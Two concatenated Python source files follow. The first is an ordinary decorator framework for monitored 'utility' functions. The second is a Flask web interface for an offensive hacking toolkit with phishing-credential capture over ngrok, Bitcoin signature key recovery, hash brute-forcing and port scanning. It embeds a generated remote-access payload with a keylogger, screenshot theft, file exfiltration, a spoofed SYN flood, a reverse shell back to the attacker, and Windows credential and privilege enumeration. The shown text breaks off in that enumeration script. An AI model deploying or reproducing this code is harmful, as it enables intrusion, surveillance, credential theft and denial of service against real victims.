class_utils = self_or_dict.get("_utilityMethods", [])
else:
class_utils = hasattr(self_or_dict, "_utilityMethods") and self_or_dict._utilityMethods or []
glob_utils = globals().get("_utilityMethods", [])
all_utils = glob_utils + class_utils
return all_utils
@staticmethod
def registerAllGlobalUtilityFunctions():
"""Registers Global space utility functions
This is instead of runtime discovery"""
glob_dict = globals()
meths = glob_dict.setdefault("_utilityMethods", [])
for elem in glob_dict:
elem = glob_dict.get(elem)
if callable(elem) and Utility.isValidUtilityMethod(elem):
meths.append(elem)
@staticmethod
def sortUtilityFunctions(all_utils):
"""Sort out all pre, post, and concurrent utility functions
Arguments:
all_utils - a list of valid utility functions
Returns:
pre_utils, post_utils, concurrent_utils - lists of utility functions"""
if len(all_utils) < 1:
return [], [], []
util_funcs = filter(Utility.isValidUtilityMethod, all_utils)
pre_utils, post_utils, concurrent_utils = [], [], []
for func in util_funcs:
if func._utilitySpecs.get("pre", False):
pre_utils.append(func)
if func._utilitySpecs.get("post", False):
post_utils.append(func)
if func._utilitySpecs.get("concurrent", False):
                concurrent_utils.append(func)
return pre_utils, post_utils, concurrent_utils
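    # For example (given the decorators below), a function wrapped with
    # @Utility.pre_utility carries _utilitySpecs == {"pre": True, "post": False,
    # "concurrent": False} and therefore lands only in pre_utils.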
## --- UTILITY DECORATORS --- ##
@staticmethod
def utility(f):
"""A decorator to mark a function or method as a utility method.
This is to be used with the @monitor decorator.
If a global function is decorated, it'll be available in global scope to all monitored methods.
If a method is decorated, it'll be available in class scope to monitored methods."""
@wraps(f)
def new_util_f(*args, **kwargs):
# Get the global dictionary or the class/obj dictionary...
self_dict = Utility._dictOrGlobals(f, args)
# Check to see if we're already recorded, if so, remove so we can re-add
            if '_utilityMethods' in self_dict:
if f in self_dict["_utilityMethods"]:
self_dict["_utilityMethods"].remove(f)
else:
# Since we're not recording utils, start
self_dict['_utilityMethods'] = []
self_dict["_utilityMethods"].append(f)
return f(*args, **kwargs)
new_util_f._utilitySpecs={"pre":True, "post":True, "concurrent":False}
return new_util_f
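    # Hedged usage sketch: decorating a function marks it as a utility; it is
    # (re)registered in the enclosing scope's _utilityMethods list each time it runs.
    #
    #   @Utility.utility
    #   def disk_ok():                      # hypothetical example check
    #       return free_space_mb() > 100    # free_space_mb is hypothetical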
@staticmethod
def pre_utility(f):
"""A decorator to mark a function or method as a pre utility method.
See the utility method decorator for more information."""
        pre_util_ret = Utility.utility(f)
        pre_util_ret._utilitySpecs["post"] = False
        return pre_util_ret
@staticmethod
def post_utility(f):
"""A decorator to mark a function or method as a post utility method.
See the utility method decorator for more information."""
        post_util_ret = Utility.utility(f)
        post_util_ret._utilitySpecs["pre"] = False
        return post_util_ret
@staticmethod
def concurrent_utility(f):
"""A decorator to mark a function or method as a concurrent utility method.
See the utility method decorator for more information."""
        con_util_ret = Utility.utility(f)
        con_util_ret._utilitySpecs["pre"] = False
        con_util_ret._utilitySpecs["post"] = False
        con_util_ret._utilitySpecs["concurrent"] = True
        return con_util_ret
## --- CONTEXTS --- ##
@staticmethod
@contextmanager
def contextUtility(utilityFunc, *args, **kwargs):
"""A context for block-wise utility.
This method will evaluate your function result with a keyword
arg passed function, evalFunc. If this is not passed in,
        the function result is evaluated with bool. A Utility.UtilityError
        is raised if the result fails the evaluation. Otherwise
        the developer must raise UtilityError or some child thereof
        within the function (for finer control).
        Support for callbacks is via any callable object passed in as
        a kwarg named 'utilityCallback'. Args to this callable can be passed
        in as 'utilityCallbackArgs'. If no callback args are passed, the
        arg list passed to the function will be passed on to the callback.
        If the first utility check fails, a UtilityError will be yielded.
        Arguments:
            utilityFunc - a utility function used for evaluation,
This function does not have to be decorated as utility, it can be any function whatsoever
args - collection of args, passed to the function, utilityFunc
kwargs - a dictionary of keyword args, passed to the function, utilityFunc
Yields:
The result of the first evaluation of your function, utilityFunc
If the pre evaluated context fails, a UtilityError will be yielded; check for it!"""
has_yielded = False
try:
utility_result = Utility.checkUtilityResult(utilityFunc, *args, **kwargs)
yield utility_result
has_yielded = True
utility_result = Utility.checkUtilityResult(utilityFunc, *args, **kwargs)
except Utility.UtilityError:
Utility.handleCallback(*args, **kwargs)
if not has_yielded:
yield Utility.UtilityError("Your pre-evaluated context failed")
@staticmethod
@contextmanager
def contextPreUtility(utilityFunc, *args, **kwargs):
"""A context for block-wise pre-utility.
This method will evaluate your function result with a keyword
arg passed function, evalFunc. If this is not passed in,
        the function result is evaluated with bool. A Utility.UtilityError
        is raised if the result fails the evaluation. Otherwise
        the developer must raise UtilityError or some child thereof
        within the function (for finer control).
        Support for callbacks is via any callable object passed in as
        a kwarg named 'utilityCallback'. Args to this callable can be passed
        in as 'utilityCallbackArgs'. If no callback args are passed, the
        arg list passed to the function will be passed on to the callback.
        If the first utility check fails, a UtilityError will be yielded.
        Arguments:
            utilityFunc - a utility function used for evaluation,
This function does not have to be decorated as utility, it can be any function whatsoever
args - collection of args, passed to the function, utilityFunc
kwargs - a dictionary of keyword args, passed to the function, utilityFunc
Yields:
The result of the first evaluation of your function, utilityFunc
If the pre evaluated context fails, a UtilityError will be yielded; check for it!"""
has_yielded = False
try:
utility_result = Utility.checkUtilityResult(utilityFunc, *args, **kwargs)
yield utility_result
has_yielded = True
except Utility.UtilityError:
Utility.handleCallback(*args, **kwargs)
if not has_yielded:
yield Utility.UtilityError("Your pre-evaluated context failed")
@staticmethod
@contextmanager
def contextPostUtility(utilityFunc, *args, **kwargs):
"""A context for block-wise post-utility.
This method will evaluate your function result with a keyword
arg passed function, evalFunc. If this is not passed in,
        the function result is evaluated with bool. A Utility.UtilityError
        is raised if the result fails the evaluation. Otherwise
        the developer must raise UtilityError or some child thereof
        within the function (for finer control).
        Support for callbacks is via any callable object passed in as
        a kwarg named 'utilityCallback'. Args to this callable can be passed
        in as 'utilityCallbackArgs'. If no callback args are passed, the
        arg list passed to the function will be passed on to the callback.
        Arguments:
            utilityFunc - a utility function used for evaluation,
This function does not have to be decorated as utility, it can be any function whatsoever
args - collection of args, passed to the function, utilityFunc
kwargs - a dictionary of keyword args, passed to the function, utilityFunc
        Yields:
            None - the utility check runs only after your block completes"""
        try:
            # Post-utility: run the user's block first, then evaluate the utility.
            yield None
            Utility.checkUtilityResult(utilityFunc, *args, **kwargs)
except Utility.UtilityError:
Utility.handleCallback(*args, **kwargs)
@staticmethod
@contextmanager
def contextConcurrentUtility(utilityFunc, *args, **kwargs):
"""A context for block-wise concurrent-utility.
This method will evaluate your function result with a keyword
arg passed function, evalFunc. If this is not passed in,
        the function result is evaluated with bool. A Utility.UtilityError
        is raised if the result fails the evaluation. Otherwise
        the developer must raise UtilityError or some child thereof
        within the function (for finer control).
        Support for callbacks is via any callable object passed in as
        a kwarg named 'utilityCallback'. Args to this callable can be passed
        in as 'utilityCallbackArgs'. If no callback args are passed, the
        arg list passed to the function will be passed on to the callback.
        Arguments:
            utilityFunc - a utility function used for evaluation,
This function does not have to be decorated as utility, it can be any function whatsoever
args - collection of args, passed to the function, utilityFunc
kwargs - a dictionary of keyword args, passed to the function, utilityFunc
Yields:
concurrent utility thread start() status"""
try:
            t = Thread(target=utilityFunc, name=utilityFunc.__name__ + "_ContextThread", args=args, kwargs=kwargs)
t.setDaemon(True)
yield t.start()
#TODO Kill the thread here, perhaps we need to make a new killable Thread class
# (or one that just returns the threads pid, so we can os.popen("kill %d"% t_pid)
# Ideally a coroutine setup would rock, or some single thread solution.
except:
Utility.handleCallback(*args, **kwargs)
## --- MONITOR DECORATOR --- ##
## ___ The Heart ___ ##
@staticmethod
def monitor(f, *utility_funcs):
"""Decorates methods or functions that should be monitored and verified
by utility functions (those decorated with @utility or similar)
Arguments:
            *utility_funcs - the utility functions that should monitor this operation.
                If absent or passed as None, ALL available utility functions in class-wide
                and global scope will be used.
Notes:
If you monitor a global function, only global utility functions will be available
If you monitor a method, class wide and global utility functions are available"""
@wraps(f)
def new_monitor_f(*args, **kwargs):
meth_return = None
util_funcs = utility_funcs
if (util_funcs == ()) or (None in util_funcs):
if len(args) > 0 and f.__name__ in dir(args[0]):
util_funcs = Utility.getAllRegisteredUtilityFunctions(args[0])
else:
util_funcs = Utility.getAllRegisteredUtilityFunctions()
#Filter and sort the functions
pre_utils, post_utils, concurrent_utils = Utility.sortUtilityFunctions(util_funcs)
for func in pre_utils:
if not func(*args, **kwargs):
                    raise Utility.UtilityError("Pre-Utility failed for: %s" % func.__name__)
#TODO This needs to be replaced with killable threads or ideally a coroutine setup
# (or one that just returns the threads pid, so we can os.popen("kill %d"% t_pid)
for func in concurrent_utils:
t = Thread(target=func, name=func.__name__+"_ConncurrentUtilThread", args=args, kwargs=kwargs)
t.setDaemon(True)
t.start()
meth_return = f(*args, **kwargs)
for func in post_utils:
if not func(*args, **kwargs):
                    raise Utility.UtilityError("Post-Utility failed for: %s" % func.__name__)
return meth_return
return new_monitor_f
if __name__ == "__main__":
Utility.registerAllGlobalUtilityFunctions()
class TempObj(object):
__metaclass__ = RegisterUtilityMethods
@Utility.monitor
def testMonMeth(self):
print "utils1:", Utility.getAllRegisteredUtilityFunctions(self)
print "monitoring..."
@Utility.utility
def testMeth(self, arg1=1):
print "testMeth talking..."
return True
print "utils2:", Utility.getAllRegisteredUtilityFunctions()
to = TempObj()
to.testMonMeth()
@Utility.utility
def testFunc(arg1=1):
print "this is a function"
return True
testFunc()
print "utils:3", Utility.getAllRegisteredUtilityFunctions()
class TempObj2(object):
@Utility.utility
def testMeth(self, arg1=1):
print "testMeth2 talking..."
print "utils4:", Utility.getAllRegisteredUtilityFunctions(self)
return True
to2 = TempObj2()
to2.testMeth()
print "utils5:", Utility.getAllRegisteredUtilityFunctions()
def contextual_utility(arg1):
return arg1[1:]
with Utility.contextUtility(contextual_utility, [1,3,5], evalFunc=bool) as status:
print "your status is:", status
print "done"
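    # Extra (hedged) demo of the pre-only context: the check runs once before the
    # block and is not re-evaluated afterwards.
    with Utility.contextPreUtility(contextual_utility, [1, 3, 5]) as pre_status:
        print "your pre-check status is:", pre_status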
|
SCPT_web_intf.py
|
from flask import Flask,render_template,request,send_file,Response,url_for
from btc_exploit import rsz_exploit, raw_tx
from google_dorking.google_dorl import GooGle_Dork
from vunlseac import cve, vlunse, gtfobins
from Phishing import test_cli22
import subprocess as sp
from os import system
import multiprocessing
from cryptography_me_she import aes, hashs, rsa, bases
from hash_Name.hash_name import HASH_Name
from hash_bruutefrocer.hash_brute import Hash_Brut
from payload import lick
from werkzeug.utils import secure_filename
import os
from brute.protcal_brutfroce import ftp, ssh
from brute.last_brutfroce import btc_1, etm_1
from typing import Dict, List, Set
UPLOAD_FOLDER = '/home/shiky/cp2/temp/testing'
filename=""
ALLOWED_EXTENSIONS = {'txt', 'cve', 'list', 'lst', 'text', 'passwd'}
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
@app.route('/')
def index():
return render_template("index2.html")
@app.route('/btc.html')
def btc():
return render_template("btc.html")
@app.route('/btc.html', methods =["GET", "POST"])
def btc_row():
transion = request.form.get("transcation_p")
if (transion == None ):
return btc_exploit()
else:
RX = raw_tx.Get_RAW_TX()
RX_Output: str = RX.raw_txt(str(transion))
print(RX_Output)
return render_template("btc.html", rowTran=str(RX_Output))
@app.route('/btc.html', methods =["GET", "POST"])
def btc_exploit():
r: str = str(request.form.get("R"))
s1: str = str(request.form.get("S1"))
z1: str = str(request.form.get("Z1"))
s2: str = str(request.form.get("S2"))
z2: str = str(request.form.get("Z2"))
address: str = str(request.form.get("Adress"))
    # Missing form fields come back as None, which str() turns into the string "None".
    if (r == "None" and s1 == "None" and s2 == "None" and z1 == "None" and z2 == "None"):
return btc_row()
else:
RSz = rsz_exploit.RSZ_EXploit()
RSz_out: Set[str] = RSz.exploit(address, r, s1, s2, z1, z2)
print(RSz_out)
return render_template("btc.html", RSz_out=str(RSz_out))
@app.route('/cryptograpy.html')
def cryptograpy():
return render_template("cryptograpy.html")
@app.route('/cryptograpy.html', methods =["GET", "POST"])
def crptoengolll():
en_de=str(request.form.get('endeotype'))
# crptot=str(request.form.get('crptotype'))
crptofun=str(request.form.get('functiomtype'))
key=str(request.form.get('keys'))
msg=str(request.form.get('massg'))
if(en_de=="en"):
if(crptofun=="AES"):
ke1 = key
if (len(ke1) == 16):
key = bytes(ke1, 'ascii')
else:
                # Return an error instead of killing the whole server with os._exit().
                return render_template("cryptograpy.html", crotpmassg="key size must be 16")
plantxt: str = msg
AES_ED = aes.AES_CG()
a: List[bytes] = AES_ED.encrp(plantxt, key)
key: bytes = a[0]
ciph: bytes = a[1]
outp="encoded= "+ str(ciph)[1:] +"\nkey= "+ str(key)[1:]
return render_template("cryptograpy.html", crotpmassg=outp)
elif(crptofun=="RSA"):
CP = msg
RS = rsa.RSA_CG()
keys = RS.gneKeys()
# print(keys, '\n')
enc = str(RS.encodme(CP, keys["pubkey"]))[1:]
# print("encode= ", enc)
outp=str(keys["privKey"])+"\nencode= "+ enc
return render_template("cryptograpy.html", crotpmassg=outp)
        elif ("base" in crptofun):
            # NOTE: BS is never defined in this module; it is presumably meant to be an
            # encoder instance built from the imported `bases` module.
            BOutput: str = BS.base_encde(crptofun, msg)
return render_template("cryptograpy.html", crotpmassg=BOutput)
else:
HA = hashs.Hashing()
hash: str = HA.hashing(crptofun, msg)
return render_template("cryptograpy.html", crotpmassg=hash)
elif(en_de=="den"):
if (crptofun == "AES"):
ciph = bytes(msg, 'ascii')
key = bytes(key, 'ascii')
try:
AES_ED = aes.AES_CG()
dec: str = AES_ED.decp(ciph, key)
outp = "decode= " + dec
return render_template("cryptograpy.html", crotpmassg=outp)
            except Exception:
return render_template("cryptograpy.html", crotpmassg="wrong key")
elif (crptofun == "RSA"):
enc=msg
key=key
RS = rsa.RSA_CG()
# dec = str(RS.decome(enc, keys["privKey"]))[1:]
dec = str(RS.decome(enc, key))[1:]
print("decode= ", dec)
outp="decode= "+ dec
return render_template("cryptograpy.html", crotpmassg=outp)
elif ("base" in crptofun):
BOutput = BS.base_dencde(crptofun, msg)
return render_template("cryptograpy.html", crotpmassg=BOutput)
# else:
# return render_template("cryptograpy.html")
else:
return shoipk()
@app.route('/cryptograpy.html', methods =["GET", "POST"])
def shoipk():
# print("ho")
hash2: str = str(request.form.get('hashingop'))
hash: str = str(request.form.get('hash_n'))
if (hash2 == "None" and hash !=None):
return hash_brute_go()
else:
HN2 = HASH_Name()
Houtput2: str = HN2.hahs_type(hash2)
return render_template("cryptograpy.html", hashnameopppp=str(Houtput2))
@app.route('/cryptograpy.html', methods =["GET", "POST"])
def hash_brute_go():
types: str = str(request.form.get('hash_type'))
hash: str = str(request.form.get('hash_n'))
HBrut = Hash_Brut()
HB_Output: str = HBrut.hashdecod(types, hash)
return render_template("cryptograpy.html", hashop=HB_Output)
@app.route('/google_dork.html')
def google_dork():
return render_template("google_dork.html")
@app.route('/google_dork.html', methods =["GET", "POST"])
def google_dokout():
search: str = str(request.form.get('searching'))
dork: str = str(request.form.get('dorker'))
GD = GooGle_Dork()
GD_Output: str = GD.dork(search, dork)
print(GD_Output)
return render_template("google_dork.html", googleOut=str(GD_Output))
@app.route('/port_scan.html')
def port_scan():
return render_template("port_scan.html")
@app.route('/port_scan.html', methods =["GET", "POST"])
def port_go():
from port_scanner import port_scan
target: str = str(request.form.get('targging'))
port: str = str(request.form.get('portal'))
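    # Input format (as inferred from the parsing below): `target` and `port` may each be a
    # single value or a comma-separated list, e.g. targets "10.0.0.1, 10.0.0.2" and ports
    # "22, 80"; submitting port="all" scans every port on each target instead.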
option = 2
if port =="all":
option = 1
timeoutes_str = ""
LPSOutput0kop = []
print("here",option,port)
if option == 2:
if (',' in target):
sv: List[str] = target.split(',')
for i in sv:
print("target: " + str(i.strip(' ')))
LPSOutput0kop.append(str("target: " + str(i.strip(' '))))
PS = port_scan.PORT_SCAN(i.strip(' '))
if timeoutes_str == "":
if (',' in port):
PoS: List[str] = port.split(',')
for PK in PoS:
Pi: int = int(PK.strip(' '))
LPSOutput01: str = PS.scan_port(PS.target_p_ip, Pi)
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
Pi: int = int(port.strip(' '))
LPSOutput01: str = PS.scan_port(PS.target_p_ip, Pi)
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
PS = port_scan.PORT_SCAN(target)
print("target: " + str(target))
if timeoutes_str == "":
if (',' in port):
PoS: List[str] = port.split(',')
for pk in PoS:
# print("here2")
Pi: int = int(pk.strip(' '))
LPSOutput01: str = PS.scan_port(PS.target_p_ip, Pi)
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
Pi: int = int(port.strip(' '))
LPSOutput01: str = PS.scan_port(PS.target_p_ip, Pi)
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
# print("here1")
if (',' in port):
# print("here")
PoS: List[str] = port.split(',')
for pk in PoS:
Pi: int = int(pk.strip(' '))
LPSOutput01 = PS.scan_port(PS.target_p_ip, Pi, float(timeoutes_str))
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
# print("here1")
Pi: int = int(port.strip(' '))
LPSOutput01 = PS.scan_port(PS.target_p_ip, Pi, float(timeoutes_str))
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
if (',' in target):
sv = target.split(',')
for i in sv:
print("target: " + str(i.strip(' ')))
LPSOutput0kop.append(str("target: " + str(i.strip(' '))))
PS = port_scan.PORT_SCAN(i.strip(' '))
if timeoutes_str == "":
LPSOutput01 = PS.Scan_All_Ports()
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
PS = port_scan.PORT_SCAN(target)
print("target: " + str(target))
if timeoutes_str == "":
LPSOutput01 = PS.Scan_All_Ports()
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
soutping=""
if LPSOutput0kop == None:
pass
else:
for out in LPSOutput0kop:
soutping+=str(out)+"\n"
return render_template("port_scan.html", porting=str(soutping))
# @app.route('/web_scan.html')
# def web_scan():
# return render_template("web_scan.html")
@app.route('/vuln_search.html')
def vuln_search():
return render_template("vuln_search.html")
@app.route('/vuln_search.html', methods =["GET", "POST"])
def vuln_go():
search: str = str(request.form.get('servicetx'))
vuln_type: str = str(request.form.get('vulnapi'))
vunlout=""
if vuln_type == "vunldb":
api_key: str = "66a0565094d918c985d5de682c87606b"
# service: str = "ssh 2"
VS = vlunse.Vulnerability_Search()
bug: List[str] = VS.vuln_search(search, api_key)
vunlout=bug
elif vuln_type == "CVE":
# search: str = "5.10.0 kali7"
# search: str = "vsFTPd 2.3.4"
CV = cve.CVE_Search()
d: Dict[str, str] = CV.cve_search(search.replace(' ', '+'))
vunlout=d
elif vuln_type == "gtfobin":
# search: str = "nmap"
# dork:int=3
GD = gtfobins.GooGle_Dork()
GD_Output: str = GD.dork(search)
vunlout=GD_Output
return render_template("vuln_search.html", vunlout=str(vunlout))
@app.route('/phishing.html')
def phishing():
return render_template("phishing.html")
@app.route('/phishing.html', methods =["GET", "POST"])
def phishinggo():
page: str = str(request.form.get('page'))
ptype:str= str(request.form.get('ptype'))
rdurl:str = str(request.form.get('redurl'))
dirk: str = str(sp.getoutput('pwd'))
if ("/Phishing" not in dirk):
dirk += "/Phishing"
try:
PHish = test_cli22.Phishing_cli()
PHish.check_need()
PHish.runPhishing(page, ptype,PHish.dirk)
PHish.inputCustom(rdurl, dirk)
port = 56
PHish.runServer(port)
url = PHish.runNgrok(port, dirk)
print(url)
while True:
multiprocessing.Process(target=PHish.runServer, args=(port,)).start()
out = PHish.getCredentialsWEB()
for i in out:
return render_template("phishing.html", phingurl=url, phinshingout=i)
except KeyboardInterrupt:
system('sudo pkill ngrok')
@app.route('/payload.html')
def payload():
return render_template("payload.html")
@app.route('/payload.html', methods =["GET", "POST"])
def paylod_go_connect_sh():
ip: str = str(request.form.get('ips'))
port: str = str(request.form.get('ports'))
if request.form.get('listening') == 'listening':
print("listening pressed")
# host = str(self.lineEdit2.text())
port = int(port)
global rv
rv = lick.revab(ip, port)
rv.getconnections()
rv.allin()
address = rv.allAddress
ad="connections:\n"
for i in address:
ad+=str([i[0] + ":" + str(i[1])])+"\n"
return render_template("payload.html", targetstoconnct=ad)
elif request.form.get('genrating') == 'genrating':
print("genrating pressed")
payload_strick = """
import os, json, subprocess, sys, threading, random, socket
from urllib.request import Request, urlopen
try:
from pynput.keyboard import Listener
from PIL import ImageGrab
from scapy.all import *
except:
os.system("pip install PIL")
os.system("pip install pynput")
os.system("pip install scapy")
from pynput.keyboard import Listener
from PIL import ImageGrab
from scapy.all import *
keys = []
count = 0
# path_windos = "\\\Keyloags.txt"
path_unix = "/tmp/keyloags.txt"
if "nt" in os.name:
p = subprocess.Popen("powershell $env:TEMP", shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
output = p.stdout.read()
output = output.decode()
o = output.replace(" ", "").replace("\\r", "").replace("\\n", "").replace("'", "").replace("Path", "").replace("--","")
path_unix = o + "\\\keyloags.txt"
else:
path_unix = "/tmp/keyloags.txt"
global flage
flage = 0
def write_file(keys):
with open(path_unix, "a") as wfile:
for key in keys:
k = str(key).replace("'", "")
if (k.find("backspace") > 0):
wfile.write(" Backspace ")
elif (k.find("enter") > 0):
wfile.write("\\n")
elif (k.find("shift") > 0):
wfile.write(" Shift ")
elif (k.find("space") > 0):
wfile.write(" ")
elif (k.find("caps_lock") > 0):
wfile.write(" Caps_lock ")
elif (k.find("up") > 0):
wfile.write(" Key.up ")
elif (k.find("down") > 0):
wfile.write(" Key.down ")
elif (k.find("right") > 0):
wfile.write(" Key.right ")
elif (k.find("lefts") > 0):
wfile.write(" Key.lefts ")
elif (k.find("ctrl_r") > 0):
wfile.write(" Key.ctrl_r ")
elif (k.find("tab") > 0):
wfile.write(" Key.tab ")
elif (k.find("alt") > 0):
wfile.write(" Key.alt ")
elif (k.find("key")):
wfile.write(k)
def on_press(key):
global keys, count
keys.append(key)
count += 1
if (count >= 1):
count = 0
write_file(keys)
keys = []
def key_logs():
os.remove(path_unix)
global listener
with Listener(on_press=on_press) as listener:
listener.join()
def stop_key_log():
flage = 1
listener.stop()
upload_file(path_unix)
def dos(target_IP, stop):
# target_IP = input("Enter IP address of Target: ")
i = 1
while True:
a = str(random.randint(1, 254))
b = str(random.randint(1, 254))
c = str(random.randint(1, 254))
d = str(random.randint(1, 254))
dot = "."
Source_ip = a + dot + b + dot + c + dot + d
for source_port in range(1, 65535):
            # scapy keyword arguments are src/dst and sport/dport;
            # use the iterated source_port as the spoofed source port.
            IP1 = IP(src=Source_ip, dst=target_IP)
            TCP1 = TCP(sport=source_port, dport=80)
            pkt = IP1 / TCP1
            send(pkt, inter=.001)
            connt.send(("packet sent " + str(i)).encode())
i = i + 1
if (stop == i):
break
def full_shell():
# print(port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect((host, port + 1));
# reliable_send(li)
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
if "nt" in os.name:
p = subprocess.call(["cmd.exe", ""]);
else:
p = subprocess.call(["/bin/sh", "-i"]);
def screen_shoter():
screen_shot = ImageGrab.grab()
if "nt" in os.name:
p = subprocess.Popen("powershell $env:TEMP", shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
output = p.stdout.read()
output = output.decode()
o = output.replace(" ", "").replace("\\r", "").replace("\\n", "").replace("'", "").replace("Path", "").replace(
"--", "")
screen_shot.save(o + "\\\screep.png")
else:
screen_shot.save("/temp/screep.png")
def upload_file(file_name):
f = open(file_name, "rb")
connt.send(f.read())
def download_file(file_name):
k = "/"
if "nt" in os.name:
k = "\\\\"
else:
k = "/"
c = 0
while True:
if ("/" in k or "\\\\" in k):
k = file_name[c:]
c += 1
# print("her", k)
# print(c)
else:
break
# print(k)
f = open(k, "wb")
# print('kkkk')
connt.settimeout(1)
chunk = connt.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = connt.recv(1024)
except socket.timeout as e:
break
connt.settimeout(None)
f.close()
def relaible_recv():
data = ''
while True:
try:
data = data + connt.recv(1024).decode().rstrip()
return json.loads(data)
except ValueError:
continue
def reliable_send(data):
jsondata = json.dumps(data)
connt.send(jsondata.encode())
def shell_do():
while True:
command = relaible_recv()
# print(command)
if (command == "exit"):
break
# if (command == ""):
# pass
elif (command == "stkeylog"):
t = threading.Thread(target=key_logs)
t.start()
reliable_send("key loger is started")
# while flage !=1:
# stop_key_log()
elif (command == "spkeylog"):
# t = threading.Thread(taget=key_logs)
# t.start()
# while flage !=1:
stop_key_log()
t.join()
elif (command[:3] == "dos"):
comm = command[4:]
t_ip = str(comm[0:comm.find(" ")])
stop_at = int(comm[comm.find(" "):].replace(" ", "")) + 1
dos(t_ip, stop_at)
elif (command == "screenshoot"):
screen_shoter()
if "nt" in os.name:
p = subprocess.Popen("powershell $env:TEMP", shell=False, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = p.stdout.read()
output = output.decode()
o = output.replace(" ", "").replace("\\r", "").replace("\\n", "").replace("'", "").replace("Path",
"").replace(
"--", "")
upload_file(o + "\\\screep.png")
else:
upload_file("/temp/screep.png")
elif (command[:6] == "upload"):
download_file(command[7:])
elif (command[:8] == "download"):
reliable_send(command)
upload_file(command[9:])
# time.sleep(4)
elif (command == "shell"):
# while command == "" or command == "shell" or command == None:
t2 = threading.Thread(target=full_shell)
t2.start()
t2.join()
elif (command == "enum"):
if "nt" in os.name:
print("windows")
f = '''echo #########user info > %temp%\\\winenumoutp22.txt
echo ##################Hostname >> %temp%\\\winenumoutp22.txt
hostname >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ##################whoami >> %temp%\\\winenumoutp22.txt
whoami >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ##################echo %%USERNAME%% >> %temp%\\\winenumoutp22.txt
echo %USERNAME% >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ##################net users >> %temp%\\\winenumoutp22.txt
net users >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ##################net user %%USERNAME%% >> %temp%\\\winenumoutp22.txt
net user %USERNAME% >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ################## systeminfo >> %temp%\\\winenumoutp22.txt
systeminfo >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ################## fsutil fsinfo drives >> %temp%\\\winenumoutp22.txt
fsutil fsinfo drives >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ################## path >> %temp%\\\winenumoutp22.txt
echo %PATH% >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ################## tasklist /SVC >> %temp%\\\winenumoutp22.txt
tasklist /SVC >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ################## Checking if .msi files are always installed with elevated privlidges>> %temp%\\\winenumoutp22.txt
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated /v AlwaysInstallElevated >> %temp%\\\winenumoutp22.txt
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated /v AlwaysInstallElevated >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo #### Checking for backup SAM files >> %temp%\\\winenumoutp22.txt
echo #### dir %SYSTEMROOT%\\repair\SAM >> %temp%\\\winenumoutp22.txt
dir %%SYSTEMROOT%%\\repair\SAM >> %temp%\\\winenumoutp22.txt
echo #### dir %SYSTEMROOT%\system32\config\\regback\SAM >> %temp%\\\winenumoutp22.txt
dir %%SYSTEMROOT%%\system32\config\\regback\SAM >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo #### USES AccessChk from sysinternals >> %temp%\\winenumoutp22.txt
accesschk.exe -uwcqv "Authenticated Users" * /accepteula >> %temp%\\winenumoutp22.txt
accesschk.exe -uwcqv "Users" * /accepteula >> %temp%\\winenumoutp22.txt
accesschk.exe -uwcqv "Everyone" * /accepteula >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## Checking for possible creds >> %temp%\\winenumoutp22.txt
echo ################## type c:\sysprep.inf >> %temp%\\winenumoutp22.txt
type c:\sysprep.inf >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## type c:\sysprep\sysprep.xml>> %temp%\\winenumoutp22.txt
type c:\sysprep\sysprep.xml >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## Network Information >> %temp%\\winenumoutp22.txt
echo ################## ipconfig /all >> %temp%\\winenumoutp22.txt
ipconfig /all >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## net use (view current connetions) >> %temp%\\winenumoutp22.txt
net use >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## net share (view shares) >> %temp%\\winenumoutp22.txt
net share >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## arp -a >> %temp%\\winenumoutp22.txt
arp -a >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## route print>> %temp%\\winenumoutp22.txt
route print >> %temp%\\winenumoutp22.txt
